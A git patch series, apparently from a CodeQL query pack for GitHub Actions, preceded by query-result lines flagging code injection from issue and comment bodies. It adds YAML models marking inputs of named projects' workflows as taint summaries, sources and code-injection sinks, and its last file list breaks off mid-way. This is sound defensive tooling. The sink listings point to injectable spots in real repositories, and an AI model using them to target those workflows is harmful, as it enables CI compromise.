.github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | ${{ github.event.comment.body }} | | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | ${{ github.event.issue.body }} | From d1a4d18fca36aab804ce643d14db1c246c34c7c3 Mon Sep 17 00:00:00 2001 From: jorgectf Date: Tue, 16 Apr 2024 21:33:50 +0200 Subject: [PATCH 0175/1267] Add composite actions summaries and sources --- .../apache_incubator-kie-tools.model.yml | 6 ++++++ .../aws-powertools_powertools-lambda-python.model.yml | 6 ++++++ .../composite-actions/drawpile_drawpile.model.yml | 7 +++++++ .../elastic_apm-server.model copy.yml | 7 +++++++ .../composite-actions/flagsmith_flagsmith.model.yml | 6 ++++++ .../googlecloudplatform_dataflowtemplates.model.yml | 11 +++++++++++ .../composite-actions/hashicorp_vault.model.yml | 8 +++++++- .../jhipster_generator-jhipster.model.yml | 7 ++++++- .../composite-actions/linkerd_linkerd2.model.yml | 9 ++++++++- .../generated/composite-actions/novuhq_novu.model.yml | 7 ++++++- .../philosowaffle_peloton-to-garmin.model.yml | 7 ++++++- .../generated/composite-actions/saltstack_salt.yml | 6 ++++++ .../streetsidesoftware_cspell.model.yml | 7 ++++++- 13 files changed, 88 insertions(+), 6 deletions(-) create mode 100644 ql/lib/ext/generated/composite-actions/apache_incubator-kie-tools.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/aws-powertools_powertools-lambda-python.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/drawpile_drawpile.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/elastic_apm-server.model copy.yml create mode 100644 ql/lib/ext/generated/composite-actions/flagsmith_flagsmith.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/googlecloudplatform_dataflowtemplates.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/saltstack_salt.yml diff --git a/ql/lib/ext/generated/composite-actions/apache_incubator-kie-tools.model.yml b/ql/lib/ext/generated/composite-actions/apache_incubator-kie-tools.model.yml new file mode 100644 index 00000000000..37f3efbeded --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/apache_incubator-kie-tools.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["apache/incubator-kie-tools", "*", "input.pnpm_filter_string", "output.pnpm_filter_string", "taint", "manual"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/aws-powertools_powertools-lambda-python.model.yml b/ql/lib/ext/generated/composite-actions/aws-powertools_powertools-lambda-python.model.yml new file mode 100644 index 00000000000..6dffbff40d3 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/aws-powertools_powertools-lambda-python.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: summaryModel + data: + - ["aws-powertools/powertools-lambda-python", "*", "input.artifact_name_prefix", "output.artifact_name", "taint", "manual"] diff --git a/ql/lib/ext/generated/composite-actions/drawpile_drawpile.model.yml b/ql/lib/ext/generated/composite-actions/drawpile_drawpile.model.yml new file mode 100644 index 00000000000..63085c045d0 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/drawpile_drawpile.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: summaryModel + data: + - ["drawpile/drawpile", "*", "input.cache_key", "output.cache_key", "taint", "manual"] + - ["drawpile/drawpile", "*", "input.path", "output.path", "taint", "manual"] diff --git a/ql/lib/ext/generated/composite-actions/elastic_apm-server.model copy.yml b/ql/lib/ext/generated/composite-actions/elastic_apm-server.model copy.yml new file mode 100644 index 00000000000..023abac3631 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/elastic_apm-server.model copy.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: summaryModel + data: + - ["elastic/apm-server", "*", "input.version", "output.release-version", "taint", "manual"] + - ["elastic/apm-server", "*", "input.version", "output.release-branch", "taint", "manual"] diff --git a/ql/lib/ext/generated/composite-actions/flagsmith_flagsmith.model.yml b/ql/lib/ext/generated/composite-actions/flagsmith_flagsmith.model.yml new file mode 100644 index 00000000000..37e1d0d67a5 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/flagsmith_flagsmith.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: summaryModel + data: + - ["flagsmith/flagsmith", "*", "input.aws_ecr_repository_arn", "output.image", "taint", "manual"] diff --git a/ql/lib/ext/generated/composite-actions/googlecloudplatform_dataflowtemplates.model.yml b/ql/lib/ext/generated/composite-actions/googlecloudplatform_dataflowtemplates.model.yml new file mode 100644 index 00000000000..ab1cac6b691 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/googlecloudplatform_dataflowtemplates.model.yml @@ -0,0 +1,11 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["googlecloudplatform/magic-modules", "*", "inputs.repo", "code-injection", "generated"] + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sourceModel + data: + - ["googlecloudplatform/magic-modules", "*", "output.changed-files", "PR changed files", "manual"] diff --git a/ql/lib/ext/generated/composite-actions/hashicorp_vault.model.yml b/ql/lib/ext/generated/composite-actions/hashicorp_vault.model.yml index bcd6e0eda31..ba213f0363b 100644 --- a/ql/lib/ext/generated/composite-actions/hashicorp_vault.model.yml +++ b/ql/lib/ext/generated/composite-actions/hashicorp_vault.model.yml @@ -4,4 +4,10 @@ extensions: extensible: sinkModel data: - ["hashicorp/vault", "*", "inputs.destination", "code-injection", "generated"] - - ["hashicorp/vault", "*", "inputs.version", "code-injection", "generated"] \ No newline at end of file + - ["hashicorp/vault", "*", "inputs.version", "code-injection", "generated"] + - addsTo: + pack: githubsecuritylab/actions-all + extensible: summaryModel + data: + - ["hashicorp/vault", "*", "input.vault-version", "output.vault-version", "taint", "manual"] + - ["hashicorp/vault", "*", "input.vault-binary-path", "output.vault-binary-path", "taint", "manual"] diff --git a/ql/lib/ext/generated/composite-actions/jhipster_generator-jhipster.model.yml b/ql/lib/ext/generated/composite-actions/jhipster_generator-jhipster.model.yml index 6dd3ac94306..f1b5e6df222 100644 --- a/ql/lib/ext/generated/composite-actions/jhipster_generator-jhipster.model.yml +++ b/ql/lib/ext/generated/composite-actions/jhipster_generator-jhipster.model.yml @@ -19,4 +19,9 @@ extensions: - ["jhipster/generator-jhipster", "*", "inputs.package-with-executable", "code-injection", "generated"] - ["jhipster/generator-jhipster", "*", "inputs.generator-jhipster-directory", "code-injection", "generated"] - ["jhipster/generator-jhipster", "*", "inputs.application-path", "code-injection", "generated"] - - ["jhipster/generator-jhipster", "*", "inputs.extra-args", "code-injection", "generated"] \ No newline at end of file + - ["jhipster/generator-jhipster", "*", "inputs.extra-args", "code-injection", "generated"] + - addsTo: + pack: githubsecuritylab/actions-all + extensible: summaryModel + data: + - ["jhipster/generator-jhipster", "*", "input.skip-workflow", "output.skip-workflow", "taint", "manual"] diff --git a/ql/lib/ext/generated/composite-actions/linkerd_linkerd2.model.yml b/ql/lib/ext/generated/composite-actions/linkerd_linkerd2.model.yml index 234f13b7387..e86f7432a48 100644 --- a/ql/lib/ext/generated/composite-actions/linkerd_linkerd2.model.yml +++ b/ql/lib/ext/generated/composite-actions/linkerd_linkerd2.model.yml @@ -6,4 +6,11 @@ extensions: - ["linkerd/linkerd2", "*", "inputs.component", "code-injection", "generated"] - ["linkerd/linkerd2", "*", "inputs.docker-registry", "code-injection", "generated"] - ["linkerd/linkerd2", "*", "inputs.docker-ghcr-username", "code-injection", "generated"] - - ["linkerd/linkerd2", "*", "inputs.docker-ghcr-pat", "code-injection", "generated"] \ No newline at end of file + - ["linkerd/linkerd2", "*", "inputs.docker-ghcr-pat", "code-injection", "generated"] + - addsTo: + pack: githubsecuritylab/actions-all + extensible: summaryModel + data: + - ["linkerd/linkerd2", "*", "input.component", "output.image", "taint", "manual"] + - ["linkerd/linkerd2", "*", "input.tag", "output.image", "taint", "manual"] + - ["linkerd/linkerd2", "*", "input.docker-registry", "output.image", "taint", "manual"] diff --git a/ql/lib/ext/generated/composite-actions/novuhq_novu.model.yml b/ql/lib/ext/generated/composite-actions/novuhq_novu.model.yml index f305e2a37b3..48203004ed5 100644 --- a/ql/lib/ext/generated/composite-actions/novuhq_novu.model.yml +++ b/ql/lib/ext/generated/composite-actions/novuhq_novu.model.yml @@ -3,4 +3,9 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["novuhq/novu", "*", "inputs.tag", "code-injection", "generated"] \ No newline at end of file + - ["novuhq/novu", "*", "inputs.tag", "code-injection", "generated"] + - addsTo: + pack: githubsecuritylab/actions-all + extensible: summaryModel + data: + - ["novuhq/novu", "*", "input.docker_name", "output.image", "taint", "manual"] diff --git a/ql/lib/ext/generated/composite-actions/philosowaffle_peloton-to-garmin.model.yml b/ql/lib/ext/generated/composite-actions/philosowaffle_peloton-to-garmin.model.yml index 8b45d92a5e0..3122d89f28f 100644 --- a/ql/lib/ext/generated/composite-actions/philosowaffle_peloton-to-garmin.model.yml +++ b/ql/lib/ext/generated/composite-actions/philosowaffle_peloton-to-garmin.model.yml @@ -4,4 +4,9 @@ extensions: extensible: sinkModel data: - ["philosowaffle/peloton-to-garmin", "*", "inputs.framework", "code-injection", "generated"] - - ["philosowaffle/peloton-to-garmin", "*", "inputs.os", "code-injection", "generated"] \ No newline at end of file + - ["philosowaffle/peloton-to-garmin", "*", "inputs.os", "code-injection", "generated"] + - addsTo: + pack: githubsecuritylab/actions-all + extensible: summaryModel + data: + - ["philosowaffle/peloton-to-garmin", "*", "input.os", "output.artifact_name", "taint", "manual"] diff --git a/ql/lib/ext/generated/composite-actions/saltstack_salt.yml b/ql/lib/ext/generated/composite-actions/saltstack_salt.yml new file mode 100644 index 00000000000..963518a3478 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/saltstack_salt.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: summaryModel + data: + - ["saltstack/salt", "*", "input.version", "output.version", "taint", "manual"] diff --git a/ql/lib/ext/generated/composite-actions/streetsidesoftware_cspell.model.yml b/ql/lib/ext/generated/composite-actions/streetsidesoftware_cspell.model.yml index b56944cd0ff..21ea7ef13a9 100644 --- a/ql/lib/ext/generated/composite-actions/streetsidesoftware_cspell.model.yml +++ b/ql/lib/ext/generated/composite-actions/streetsidesoftware_cspell.model.yml @@ -3,4 +3,9 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["streetsidesoftware/cspell", "*", "inputs.name", "code-injection", "generated"] \ No newline at end of file + - ["streetsidesoftware/cspell", "*", "inputs.name", "code-injection", "generated"] + - addsTo: + pack: githubsecuritylab/actions-all + extensible: summaryModel + data: + - ["streetsidesoftware/cspell", "*", "input.value", "output.value", "taint", "manual"] From 463a7a60629eda2e88024ff90b40babdd5ae6bb8 Mon Sep 17 00:00:00 2001 From: jorgectf Date: Tue, 16 Apr 2024 21:33:59 +0200 Subject: [PATCH 0176/1267] Add resuable workflow summaries and sources --- ...dposse_github-action-matrix-outputs-write.model.yml | 6 ++++++ .../element-hq_element-desktop.model.yml | 7 ++++++- .../reusable-workflows/envoyproxy_envoy.model.yml | 7 +++++++ .../hashgraph_hedera-services.model.yml | 7 +++++++ .../reusable-workflows/hashicorp_vault.model.yml | 8 +++++++- .../reusable-workflows/hitobito_hitobito.model.yml | 10 +++++++++- .../reusable-workflows/kubeshop_botkube.model.yml | 7 ++++++- .../reusable-workflows/neondatabase_neon.model.yml | 7 +++++++ .../reusable-workflows/puppeteer_puppeteer.model.yml | 6 ++++++ .../streetsidesoftware_cspell.model.yml | 7 ++++++- .../reusable-workflows/tencent_hippy.model.yml | 8 +++++++- .../reusable-workflows/zitadel_zitadel.model.yml | 7 ++++++- 12 files changed, 80 insertions(+), 7 deletions(-) create mode 100644 ql/lib/ext/generated/reusable-workflows/cloudposse_github-action-matrix-outputs-write.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/envoyproxy_envoy.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/hashgraph_hedera-services.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/neondatabase_neon.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/puppeteer_puppeteer.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/cloudposse_github-action-matrix-outputs-write.model.yml b/ql/lib/ext/generated/reusable-workflows/cloudposse_github-action-matrix-outputs-write.model.yml new file mode 100644 index 00000000000..69667ce10b1 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/cloudposse_github-action-matrix-outputs-write.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: summaryModel + data: + - ["cloudposse/github-action-matrix-outputs-write/.github/workflows/setup-test.yml", "*", "input.matrix-key", "output.result", "taint", "manual"] diff --git a/ql/lib/ext/generated/reusable-workflows/element-hq_element-desktop.model.yml b/ql/lib/ext/generated/reusable-workflows/element-hq_element-desktop.model.yml index 849a531cd7b..9f729879723 100644 --- a/ql/lib/ext/generated/reusable-workflows/element-hq_element-desktop.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/element-hq_element-desktop.model.yml @@ -8,4 +8,9 @@ extensions: - ["element-hq/element-desktop/.github/workflows/build_prepare.yaml", "*", "inputs.version", "code-injection", "generated"] - ["element-hq/element-desktop/.github/workflows/build_macos.yaml", "*", "inputs.base-url", "code-injection", "generated"] - ["element-hq/element-desktop/.github/workflows/build_macos.yaml", "*", "inputs.version", "code-injection", "generated"] - - ["element-hq/element-desktop/.github/workflows/build_linux.yaml", "*", "inputs.version", "code-injection", "generated"] \ No newline at end of file + - ["element-hq/element-desktop/.github/workflows/build_linux.yaml", "*", "inputs.version", "code-injection", "generated"] + - addsTo: + pack: githubsecuritylab/actions-all + extensible: summaryModel + data: + - ["element-hq/element-desktop/.github/workflows/build_prepare.yaml", "*", "input.deploy", "output.deploy", "taint", "manual"] diff --git a/ql/lib/ext/generated/reusable-workflows/envoyproxy_envoy.model.yml b/ql/lib/ext/generated/reusable-workflows/envoyproxy_envoy.model.yml new file mode 100644 index 00000000000..2a9e2f9fd1a --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/envoyproxy_envoy.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: summaryModel + data: + - ["envoyproxy/envoy/.github/workflows/_load.yml", "*", "input.run-id", "output.run-id", "taint", "manual"] + - ["envoyproxy/envoy/.github/workflows/_load.yml", "*", "input.check-name", "output.check-name", "taint", "manual"] diff --git a/ql/lib/ext/generated/reusable-workflows/hashgraph_hedera-services.model.yml b/ql/lib/ext/generated/reusable-workflows/hashgraph_hedera-services.model.yml new file mode 100644 index 00000000000..c9c7e8318f7 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/hashgraph_hedera-services.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: summaryModel + data: + - ["hashgraph/hedera-services/.github/workflows/zxc-publish-production-image.yaml", "*", "input.version", "output.docker-image-tag", "taint", "manual"] + - ["hashgraph/hedera-services/.github/workflows/zxc-publish-production-image.yaml", "*", "input.version", "output.docker-image", "taint", "manual"] diff --git a/ql/lib/ext/generated/reusable-workflows/hashicorp_vault.model.yml b/ql/lib/ext/generated/reusable-workflows/hashicorp_vault.model.yml index f9b7785cab9..d8be4cc11b9 100644 --- a/ql/lib/ext/generated/reusable-workflows/hashicorp_vault.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/hashicorp_vault.model.yml @@ -13,4 +13,10 @@ extensions: - ["hashicorp/vault/.github/workflows/test-go.yml", "*", "inputs.go-arch", "code-injection", "generated"] - ["hashicorp/vault/.github/workflows/test-go.yml", "*", "inputs.binary-tests", "code-injection", "generated"] - ["hashicorp/vault/.github/workflows/test-go.yml", "*", "inputs.total-runners", "code-injection", "generated"] - - ["hashicorp/vault/.github/workflows/test-enos-scenario-ui.yml", "*", "inputs.storage_backend", "code-injection", "generated"] \ No newline at end of file + - ["hashicorp/vault/.github/workflows/test-enos-scenario-ui.yml", "*", "inputs.storage_backend", "code-injection", "generated"] + - addsTo: + pack: githubsecuritylab/actions-all + extensible: summaryModel + data: + - ["hashicorp/vault/.github/workflows/build-artifacts-ce.yml", "*", "input.vault-version-package", "output.testable-packages", "taint", "manual"] + - ["hashicorp/vault/.github/workflows/build-artifacts-ce.yml", "*", "input.vault-revision", "output.testable-containers", "taint", "manual"] diff --git a/ql/lib/ext/generated/reusable-workflows/hitobito_hitobito.model.yml b/ql/lib/ext/generated/reusable-workflows/hitobito_hitobito.model.yml index e263590260f..e8c98ab4576 100644 --- a/ql/lib/ext/generated/reusable-workflows/hitobito_hitobito.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/hitobito_hitobito.model.yml @@ -4,4 +4,12 @@ extensions: extensible: sinkModel data: - ["hitobito/hitobito/.github/workflows/sbom.yml", "*", "inputs.project_name", "code-injection", "generated"] - - ["hitobito/hitobito/.github/workflows/sbom.yml", "*", "inputs.dependency_track_url", "code-injection", "generated"] \ No newline at end of file + - ["hitobito/hitobito/.github/workflows/sbom.yml", "*", "inputs.dependency_track_url", "code-injection", "generated"] + - addsTo: + pack: githubsecuritylab/actions-all + extensible: summaryModel + data: + - ["hitobito/hitobito/.github/workflows/stage-settings.yml", "*", "input.stage", "output.release_stage", "taint", "manual"] + - ["hitobito/hitobito/.github/workflows/stage-settings.yml", "*", "input.repository", "output.repo_url", "taint", "manual"] + - ["hitobito/hitobito/.github/workflows/stage-settings.yml", "*", "input.repository", "output.repo_name", "taint", "manual"] + - ["hitobito/hitobito/.github/workflows/stage-settings.yml", "*", "input.repository", "output.project", "taint", "manual"] diff --git a/ql/lib/ext/generated/reusable-workflows/kubeshop_botkube.model.yml b/ql/lib/ext/generated/reusable-workflows/kubeshop_botkube.model.yml index 50bbdaf8153..819f9f0e35d 100644 --- a/ql/lib/ext/generated/reusable-workflows/kubeshop_botkube.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/kubeshop_botkube.model.yml @@ -4,4 +4,9 @@ extensions: extensible: sinkModel data: - ["kubeshop/botkube/.github/workflows/process-chart.yml", "*", "inputs.next-version", "code-injection", "generated"] - - ["kubeshop/botkube/.github/workflows/process-chart.yml", "*", "inputs.release-branch", "code-injection", "generated"] \ No newline at end of file + - ["kubeshop/botkube/.github/workflows/process-chart.yml", "*", "inputs.release-branch", "code-injection", "generated"] + - addsTo: + pack: githubsecuritylab/actions-all + extensible: summaryModel + data: + - ["kubeshop/botkube/.github/workflows/process-chart.yml", "*", "input.next-version", "output.new-version", "taint", "manual"] diff --git a/ql/lib/ext/generated/reusable-workflows/neondatabase_neon.model.yml b/ql/lib/ext/generated/reusable-workflows/neondatabase_neon.model.yml new file mode 100644 index 00000000000..3b8a83bc8c6 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/neondatabase_neon.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: summaryModel + data: + - ["neondatabase/neon/.github/workflows/build-build-tools-image.yml", "*", "input.image-tag", "output.image-tag", "taint", "manual"] + - ["neondatabase/neon/.github/workflows/build-build-tools-image.yml", "*", "input.image-tag", "output.image", "taint", "manual"] diff --git a/ql/lib/ext/generated/reusable-workflows/puppeteer_puppeteer.model.yml b/ql/lib/ext/generated/reusable-workflows/puppeteer_puppeteer.model.yml new file mode 100644 index 00000000000..0d96077345f --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/puppeteer_puppeteer.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sourceModel + data: + - ["puppeteer/puppeteer/.github/workflows/changed-packages.yml", "*", "output.changes", "Changed files", "manual"] diff --git a/ql/lib/ext/generated/reusable-workflows/streetsidesoftware_cspell.model.yml b/ql/lib/ext/generated/reusable-workflows/streetsidesoftware_cspell.model.yml index 74bdcb807c8..0c542713430 100644 --- a/ql/lib/ext/generated/reusable-workflows/streetsidesoftware_cspell.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/streetsidesoftware_cspell.model.yml @@ -3,4 +3,9 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["streetsidesoftware/cspell/.github/workflows/reuseable-pr-from-artifact.yml", "*", "inputs.patch_path", "code-injection", "generated"] \ No newline at end of file + - ["streetsidesoftware/cspell/.github/workflows/reuseable-pr-from-artifact.yml", "*", "inputs.patch_path", "code-injection", "generated"] + - addsTo: + pack: githubsecuritylab/actions-all + extensible: summaryModel + data: + - ["streetsidesoftware/cspell/.github/workflows/reuseable-load-integrations-repo-list.yml", "*", "input.ref", "output.ref", "taint", "manual"] diff --git a/ql/lib/ext/generated/reusable-workflows/tencent_hippy.model.yml b/ql/lib/ext/generated/reusable-workflows/tencent_hippy.model.yml index 82f5ba4be74..b5d1263f743 100644 --- a/ql/lib/ext/generated/reusable-workflows/tencent_hippy.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/tencent_hippy.model.yml @@ -6,4 +6,10 @@ extensions: - ["tencent/hippy/.github/workflows/reuse_get_workflow_output.yml", "*", "inputs.workflow_run", "code-injection", "generated"] - ["tencent/hippy/.github/workflows/reuse_classify_commits.yml", "*", "inputs.pull_request_number", "code-injection", "generated"] - ["tencent/hippy/.github/workflows/reuse_approve_checks_run.yml", "*", "inputs.pull_request_head_sha", "code-injection", "generated"] - - ["tencent/hippy/.github/workflows/reuse_approve_checks_run.yml", "*", "inputs.pull_request_number", "code-injection", "generated"] \ No newline at end of file + - ["tencent/hippy/.github/workflows/reuse_approve_checks_run.yml", "*", "inputs.pull_request_number", "code-injection", "generated"] + - addsTo: + pack: githubsecuritylab/actions-all + extensible: summaryModel + data: + - ["tencent/hippy/.github/workflows/reuse_approve_checks_run.yml", "*", "input.pull_request_head_sha", "output.pull_request_head_sha", "taint", "manual"] + - ["tencent/hippy/.github/workflows/reuse_approve_checks_run.yml", "*", "input.pull_request_number", "output.pull_request_number", "taint", "manual"] diff --git a/ql/lib/ext/generated/reusable-workflows/zitadel_zitadel.model.yml b/ql/lib/ext/generated/reusable-workflows/zitadel_zitadel.model.yml index 26f9f659a2d..f7ee9b66305 100644 --- a/ql/lib/ext/generated/reusable-workflows/zitadel_zitadel.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/zitadel_zitadel.model.yml @@ -6,4 +6,9 @@ extensions: - ["zitadel/zitadel/.github/workflows/release.yml", "*", "inputs.image_name", "code-injection", "generated"] - ["zitadel/zitadel/.github/workflows/release.yml", "*", "inputs.build_image_name", "code-injection", "generated"] - ["zitadel/zitadel/.github/workflows/container.yml", "*", "inputs.build_image_name", "code-injection", "generated"] - - ["zitadel/zitadel/.github/workflows/compile.yml", "*", "inputs.version", "code-injection", "generated"] \ No newline at end of file + - ["zitadel/zitadel/.github/workflows/compile.yml", "*", "inputs.version", "code-injection", "generated"] + - addsTo: + pack: githubsecuritylab/actions-all + extensible: summaryModel + data: + - ["zitadel/zitadel/.github/workflows/container.yml", "*", "input.build_image_name", "output.build_image", "taint", "manual"] From 764f6fbc0d691b47b85f361da1f93f642b7d4a59 Mon Sep 17 00:00:00 2001 From: jorgectf Date: Tue, 16 Apr 2024 21:35:30 +0200 Subject: [PATCH 0177/1267] Fix "inputs" models typo --- ...ctions_actions-runner-controller.model.yml | 18 +++---- .../composite-actions/adap_flower.model.yml | 8 ++-- .../agoric_agoric-sdk.model.yml | 12 ++--- .../airbnb_lottie-ios.model.yml | 2 +- .../airbytehq_airbyte.model.yml | 4 +- .../amazon-ion_ion-java.model.yml | 4 +- .../composite-actions/anchore_grype.model.yml | 2 +- .../composite-actions/anchore_syft.model.yml | 2 +- .../angular_dev-infra.model.yml | 10 ++-- .../ansible_ansible-lint.model.yml | 4 +- .../composite-actions/ansible_awx.model.yml | 4 +- .../apache_arrow-datafusion.model.yml | 2 +- .../apache_arrow-rs.model.yml | 4 +- .../composite-actions/apache_arrow.model.yml | 2 +- .../apache_bookkeeper.model.yml | 2 +- .../composite-actions/apache_brpc.model.yml | 2 +- .../apache_camel-k.model.yml | 24 +++++----- .../composite-actions/apache_camel.model.yml | 12 ++--- .../composite-actions/apache_flink.model.yml | 10 ++-- .../composite-actions/apache_nuttx.model.yml | 6 +-- .../apache_opendal.model.yml | 8 ++-- .../composite-actions/apache_pekko.model.yml | 2 +- .../apache_pulsar-helm-chart.model.yml | 14 +++--- .../apache_superset.model.yml | 2 +- .../appflowy-io_appflowy.model.yml | 4 +- .../aptos-labs_aptos-core.model.yml | 6 +-- .../archivesspace_archivesspace.model.yml | 2 +- .../armadaproject_armada.model.yml | 2 +- .../composite-actions/armbian_build.model.yml | 18 +++---- .../auth0_auth0-java.model.yml | 8 ++-- .../auth0_auth0.net.model.yml | 6 +-- .../auth0_auth0.swift.model.yml | 2 +- .../autogluon_autogluon.model.yml | 10 ++-- .../composite-actions/avaiga_taipy.model.yml | 2 +- .../aws-amplify_amplify-cli.model.yml | 2 +- .../aws_amazon-vpc-cni-k8s.model.yml | 4 +- .../aws_karpenter-provider-aws.model.yml | 4 +- .../awslabs_amazon-eks-ami.model.yml | 14 +++--- .../awslabs_aws-lambda-rust-runtime.model.yml | 2 +- .../azerothcore_azerothcore-wotlk.model.yml | 4 +- .../azure_azure-datafactory.model.yml | 4 +- .../badges_shields.model.yml | 2 +- .../balena-io_etcher.model.yml | 2 +- .../balena-os_balena-engine.model.yml | 2 +- .../ben-manes_caffeine.model.yml | 10 ++-- .../composite-actions/bokeh_bokeh.model.yml | 2 +- .../botpress_botpress.model.yml | 2 +- ...intree_braintree-android-drop-in.model.yml | 6 +-- .../braintree_braintree_android.model.yml | 8 ++-- .../broadinstitute_gatk.model.yml | 6 +-- .../canonical_multipass.model.yml | 4 +- .../chia-network_actions.model.yml | 12 ++--- .../chia-network_chia-blockchain.model.yml | 2 +- .../chipsalliance_chisel.model.yml | 4 +- .../chocobozzz_peertube.model.yml | 4 +- .../cilium_cilium-cli.model.yml | 14 +++--- .../composite-actions/cilium_cilium.model.yml | 6 +-- .../citusdata_citus.model.yml | 6 +-- .../clerk_javascript.model.yml | 10 ++-- .../cloud-custodian_cloud-custodian.model.yml | 8 ++-- .../cloudflare_workers-sdk.model.yml | 2 +- ...cloudfoundry_cloud_controller_ng.model.yml | 2 +- .../composite-actions/coder_coder.model.yml | 2 +- .../composite-actions/coil-kt_coil.model.yml | 2 +- .../commaai_openpilot.model.yml | 6 +-- .../conan-io_conan-center-index.model.yml | 4 +- .../corretto_corretto-8.model.yml | 8 ++-- .../cosmos_cosmos-sdk.model.yml | 2 +- .../composite-actions/coturn_coturn.model.yml | 2 +- .../crunchydata_postgres-operator.model.yml | 2 +- .../composite-actions/cvc5_cvc5.model.yml | 20 ++++---- .../composite-actions/d2l-ai_d2l-en.model.yml | 8 ++-- ...build-check-deploy-gradle-action.model.yml | 14 +++--- .../datadog_dd-trace-dotnet.model.yml | 10 ++-- .../datadog_dd-trace-go.model.yml | 8 ++-- .../datadog_dd-trace-js.model.yml | 4 +- .../datafuselabs_databend.model.yml | 4 +- .../davatorium_rofi.model.yml | 6 +-- .../debezium_debezium.model.yml | 2 +- .../defenseunicorns_zarf.model.yml | 2 +- ...lifiees_demarches-simplifiees.fr.model.yml | 2 +- ...of-veterans-affairs_vets-website.model.yml | 2 +- .../devexpress_devextreme.model.yml | 6 +-- .../diggerhq_digger.model.yml | 8 ++-- .../diku-dk_futhark.model.yml | 4 +- .../discourse_.github.model.yml | 2 +- .../dnsjava_dnsjava.model.yml | 6 +-- .../dotintent_react-native-ble-plx.model.yml | 2 +- .../dotnet_docs-tools.model.yml | 2 +- .../dotnet_dotnet-monitor.model.yml | 2 +- .../dragonflydb_dragonfly.model.yml | 8 ++-- .../eksctl-io_eksctl.model.yml | 6 +-- .../elastic_apm-agent-dotnet.model.yml | 4 +- .../elastic_apm-agent-java.model.yml | 10 ++-- .../elementor_elementor.model.yml | 16 +++---- .../composite-actions/emberjs_data.model.yml | 2 +- .../composite-actions/emqx_emqx.model.yml | 6 +-- .../eonasdan_tempus-dominus.model.yml | 4 +- .../composite-actions/erlang_otp.model.yml | 4 +- .../esphome_esphome.model.yml | 6 +-- .../composite-actions/expensify_app.model.yml | 18 +++---- .../composite-actions/expo_expo.model.yml | 2 +- .../expo_vscode-expo.model.yml | 6 +-- ...xternal-secrets_external-secrets.model.yml | 4 +- .../facebook_buck2.model.yml | 2 +- .../composite-actions/facebook_flow.model.yml | 2 +- .../composite-actions/facebook_yoga.model.yml | 4 +- .../facebookresearch_xformers.model.yml | 10 ++-- .../fastly_compute-actions.model.yml | 2 +- .../composite-actions/felangel_bloc.model.yml | 8 ++-- .../firebase_firebase-ios-sdk.model.yml | 8 ++-- .../flaxengine_flaxengine.model.yml | 2 +- ...pperdevices_flipperzero-firmware.model.yml | 10 ++-- .../composite-actions/fluxcd_flux2.model.yml | 6 +-- .../forcedotcom_salesforcedx-vscode.model.yml | 2 +- .../fossasia_visdom.model.yml | 4 +- 